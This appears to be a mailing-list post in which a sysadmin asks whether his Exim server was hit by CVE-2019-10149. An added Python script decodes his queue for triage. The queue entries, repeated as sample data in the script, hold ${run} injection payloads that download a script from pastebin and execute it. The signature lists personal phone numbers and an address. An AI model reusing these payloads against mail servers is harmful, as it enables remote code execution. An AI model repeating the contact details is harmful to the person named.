Hi,
My mail system has been hacked? CVE-2019-10149?
***
Exim version
***
exim --version
Exim version 4.89 #1 built 28-May-2019 20:13:55
aptitude show exim4-config
Package: exim4-config
Version: 4.89-2+deb9u4
***
And I have this in my mail queue:
***
19h 679 1hdvRz-0006wq-0C <> *** frozen ***
${run{\x2Fbin\x2Fsh\t-c\t\x22curl\x20https\x3a\x2F\x2Fpastebin.com\x2Fraw\x2FDj3JTtnj\x20-o\x20\x2Ftmp\x2Fbaby\x22}}@localhost
19h 679 1hdvS6-0006xB-Mg <> *** frozen ***
${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x20https\x3a\x2F\x2Fpastebin.com\x2Fraw\x2FDj3JTtnj\x20-O\x20\x2Ftmp\x2Fbaby\x22}}@localhost
19h 621 1hdvSF-0006xf-MM <> *** frozen ***
${run{\x2Fbin\x2Fsh\t-c\t\x22bash\x20\x2Ftmp\x2Fbaby\x22}}@localhost
***
Header of one mail:
***
1hdvRz-0006wq-0C-H
Debian-exim 109 113
<>
1561030915 0
-helo_name localhost
-host_address X.X.X.X.43366
-interface_address X.X.X.X.587
-received_protocol smtp
-body_linecount 0
-max_received_linelength 12
-frozen 1561030915
-host_lookup_failed
XX
1
${run{\x2Fbin\x2Fsh\t-c\t\x22curl\x20https\x3a\x2F\x2Fpastebin.com\x2Fraw\x2FDj3JTtnj\x20-o\x20\x2Ftmp\x2Fbaby\x22}}@localhost
284P Received: from [X.X.X.X] (helo=localhost)
	by mail.name.local with smtp (Exim 4.89)
	id 1hdvRz-0006wq-0C
	for
	${run{\x2Fbin\x2Fsh\t-c\t\x22curl\x20https\x3a\x2F\x2Fpastebin.com\x2Fraw\x2FDj3JTtnj\x20-o\x20\x2Ftmp\x2Fbaby\x22}}@localhost;
	Thu, 20 Jun 2019 13:41:55 +0200
012P Received: 1
012P Received: 2
012P Received: 3
012P Received: 4
012P Received: 5
012P Received: 6
012P Received: 7
012P Received: 8
012P Received: 9
013P Received: 10
013P Received: 11
013P Received: 12
013P Received: 13
013P Received: 14
013P Received: 15
013P Received: 16
013P Received: 17
013P Received: 18
013P Received: 19
013P Received: 20
013P Received: 21
013P Received: 22
013P Received: 23
013P Received: 24
013P Received: 25
013P Received: 26
013P Received: 27
013P Received: 28
013P Received: 29
013P Received: 30
013P Received: 31
Benoît
begin:vcard
fn:Benoît PELISSIER
n:PELISSIER;Benoît
org:LAN2NET - reliable IT on Linux + free software;member of the "Alliance-Libre" network
adr;dom:12 avenue Jules Verne;;Les Espaces Jules Verne, bâtiment A;SAINT-SEBASTIEN SUR LOIRE;;44230
email;internet:bpelissier@???
title:System & network technician
tel;work:02 85 52 65 37
tel;cell:06 86 03 60 26
url:http://www.lan2net.fr
version:2.1
end:vcard
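An added triage helper for queue listings like the one in the post above. This is my own example, not code from the post or from the Exim project: it parses the `exim -bp` style listing the poster pasted, reverses the `\xNN` / `\t` escaping Exim applies when it prints an address, and reports every recipient whose local part carries a `${run{...}}` expansion item, which is the pattern CVE-2019-10149 abuses. The three queue entries in `SAMPLE_QUEUE` and the version line in `SAMPLE_VERSION` are copied from the post; the function names, the report layout and the argv splitting (a `shlex` approximation of how Exim splits the `${run}` argument, not Exim's own parser) are assumptions of mine. The affected upstream range 4.87 through 4.91 is the published one for this CVE; since distributions backport fixes without changing the upstream number (the poster's 4.89-2+deb9u4 is a Debian package revision), a positive version match only means the package changelog must be checked.

```python
"""Triage an `exim -bp` listing for CVE-2019-10149 style recipients.

Added example, not code from the original post or from Exim.
"""
import re
import shlex

# Escapes Exim prints for special characters in addresses: \xNN, \t, \n, \r, \\
_ESCAPE = re.compile(r'\\x([0-9A-Fa-f]{2})|\\([tnr\\])')
_SIMPLE = {'t': '\t', 'n': '\n', 'r': '\r', '\\': '\\'}

# First line of a queue entry: "<age> <size> <message-id> <sender> [*** frozen ***]"
_ENTRY = re.compile(
    r'^\s*(\S+)\s+(\S+)\s+([0-9A-Za-z]{6}-[0-9A-Za-z]{6}-[0-9A-Za-z]{2})'
    r'\s+<([^>]*)>\s*(.*)$')

_RUN_ITEM = re.compile(r'\$\{run\{(.*?)\}\}')

# Upstream releases affected by CVE-2019-10149 (fixed in 4.92).
_AFFECTED_RANGE = ((4, 87), (4, 91))

# Constructed sample: the three queue entries quoted in the post.
SAMPLE_QUEUE = r"""
19h   679 1hdvRz-0006wq-0C <> *** frozen ***
          ${run{\x2Fbin\x2Fsh\t-c\t\x22curl\x20https\x3a\x2F\x2Fpastebin.com\x2Fraw\x2FDj3JTtnj\x20-o\x20\x2Ftmp\x2Fbaby\x22}}@localhost

19h   679 1hdvS6-0006xB-Mg <> *** frozen ***
          ${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x20https\x3a\x2F\x2Fpastebin.com\x2Fraw\x2FDj3JTtnj\x20-O\x20\x2Ftmp\x2Fbaby\x22}}@localhost

19h   621 1hdvSF-0006xf-MM <> *** frozen ***
          ${run{\x2Fbin\x2Fsh\t-c\t\x22bash\x20\x2Ftmp\x2Fbaby\x22}}@localhost
"""
SAMPLE_VERSION = "Exim version 4.89 #1 built 28-May-2019 20:13:55"


def unescape(text):
    """Reverse Exim's printable escaping so the payload reads as the shell saw it."""
    def repl(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))
        return _SIMPLE[m.group(2)]
    return _ESCAPE.sub(repl, text)


def run_commands(address):
    """Decoded command string and argv for each ${run{...}} item in an address."""
    out = []
    for m in _RUN_ITEM.finditer(address):
        cmd = unescape(m.group(1))
        # Assumption: POSIX shlex splitting (whitespace + double quotes) is a
        # close enough stand-in for Exim's ${run} argument splitting for triage.
        out.append({'command': cmd, 'argv': shlex.split(cmd)})
    return out


def triage_queue(listing):
    """Parse a -bp listing; return the entries with an expansion item in a recipient."""
    entries = []
    for raw in listing.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = _ENTRY.match(line)
        if m:
            age, size, msgid, sender, rest = m.groups()
            entries.append({'id': msgid, 'age': age, 'size': size, 'sender': sender,
                            'frozen': 'frozen' in rest, 'recipients': []})
        elif entries:
            # Already-delivered recipients are prefixed with "D " in -bp output.
            entries[-1]['recipients'].append(line[2:] if line.startswith('D ') else line)
    report = []
    for e in entries:
        hits = [{'recipient': r, 'run': run_commands(r)}
                for r in e['recipients'] if '${' in r.rsplit('@', 1)[0]]
        if hits:
            report.append(dict(e, hits=hits))
    return report


def upstream_version_affected(version_output):
    """True if the upstream release number falls in 4.87..4.91.

    Caveat: a True result means "check the distribution changelog", not
    "unpatched"; backported fixes keep the upstream number.
    """
    m = re.search(r'Exim version (\d+)\.(\d+)', version_output)
    if not m:
        raise ValueError('no Exim version string found')
    v = (int(m.group(1)), int(m.group(2)))
    return _AFFECTED_RANGE[0] <= v <= _AFFECTED_RANGE[1]


if __name__ == '__main__':
    print('upstream range affected:', upstream_version_affected(SAMPLE_VERSION))
    for e in triage_queue(SAMPLE_QUEUE):
        state = 'frozen' if e['frozen'] else 'queued'
        for h in e['hits']:
            for r in h['run']:
                print(f"{e['id']} ({state}) from <{e['sender']}>: {r['argv']}")
```

On a live system feed it the real listing (`exim -bp | python3 triage.py` after swapping `SAMPLE_QUEUE` for `sys.stdin.read()`), then treat every reported argv as an indicator: the fetched URL, the dropped path and the follow-up `bash` of that path are what to look for on disk and in the Exim main log, whether or not the entries are still frozen.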